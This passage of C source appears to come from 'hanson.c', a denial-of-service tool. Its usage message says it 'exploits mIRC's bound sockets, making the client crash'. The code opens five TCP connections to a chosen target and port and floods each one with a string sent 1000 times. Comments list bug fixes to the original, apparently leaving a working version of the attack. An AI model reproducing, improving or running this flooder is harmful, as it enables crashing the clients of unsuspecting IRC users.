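 * Connect TCP socket `sock` to server:port. `server` may be a host name or a
 * dotted quad: gethostbyname() is tried first (as in the original), then
 * inet_addr(). Returns 0 on success, -3 if the name cannot be resolved (the
 * socket is left open for the caller), -4 if connect() fails (the socket has
 * already been closed here).
 *
 * Bugs fixed vs. the original: the function fell off the end with a bare
 * `return;` in a non-void function, so its result was indeterminate;
 * inet_addr() failure was tested with `< 0` on an unsigned value and could
 * never trigger; h_addr_list[0] replaces the BSD-only h_addr macro; the
 * address family is checked; sizeof(blah) instead of a literal 16; the
 * resolution-failure message no longer goes through perror(), since
 * gethostbyname() does not set errno.
 */
int open_sock(int sock, char *server, int port) {
    struct sockaddr_in blah;
    struct hostent *he;

    memset(&blah, 0, sizeof(blah));
    blah.sin_family = AF_INET;
    blah.sin_port = htons(port);

    he = gethostbyname(server);
    if (he != NULL && he->h_addrtype == AF_INET && he->h_addr_list[0] != NULL) {
        memcpy(&blah.sin_addr, he->h_addr_list[0], sizeof(blah.sin_addr));
    } else {
        blah.sin_addr.s_addr = inet_addr(server);
        if (blah.sin_addr.s_addr == INADDR_NONE) {
            fprintf(stderr, "gethostbyname(): cannot resolve %s\n", server);
            return(-3);
        }
    }

    if (connect(sock, (struct sockaddr *)&blah, sizeof(blah)) == -1) {
        perror("connect()");
        close(sock);
        return(-4);
    }
    printf(" Connected to [%s:%d].\n", server, port);
    return(0);
}

/*
 * hanson entry point: "<target> <port>". Opens five TCP connections to the
 * target one after another and on each one writes `str` 1000 times, then
 * closes it. Returns 0; exits with 0 on a usage error (as the original did)
 * and with -1 on an invalid port or a socket() failure.
 *
 * Bugs fixed vs. the original: `void main` is now `int main`; the port is
 * parsed and range-checked once instead of on every iteration; open_sock()'s
 * result is honoured (before, a failed connect was followed by 1000 send()
 * calls on an already-closed descriptor); a failed send() stops the loop;
 * every socket is closed, not just the last one.
 */
int main(int argc, char *argv[]) {
    int t, rc;

    if (argc != 3) {
        printf("hanson.c - myn@efnet\n\n");
        printf("This lil program exploits mIRC's bound sockets, making the client crash\n\n");
        printf("Usage: %s <target> <port>\n",argv[0]);
        exit(0);
    }
    printf("hanson.c - myn@efnet\n\n");

    p = atoi(argv[2]);
    if (p <= 0 || p > 65535) {
        fprintf(stderr, "Invalid port: %s\n", argv[2]);
        exit(-1);
    }

    for (t = 0; t < 5; t++) {
        if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
            perror("socket()");
            exit(-1);
        }
        rc = open_sock(s, argv[1], p);
        if (rc != 0) {
            if (rc == -3) close(s);   /* -4 means open_sock() already closed it */
            continue;
        }
        printf(" Sending string 1ooo times to %s port %i... \n", argv[1], p);
        for (i = 0; i < 1000; i++) {
            if (send(s, str, strlen(str), 0x0) == -1) {
                perror("send()");
                break;
            }
        }
        printf("mmmmb0p.\n");
        close(s);
    }
    return 0;
}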
-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------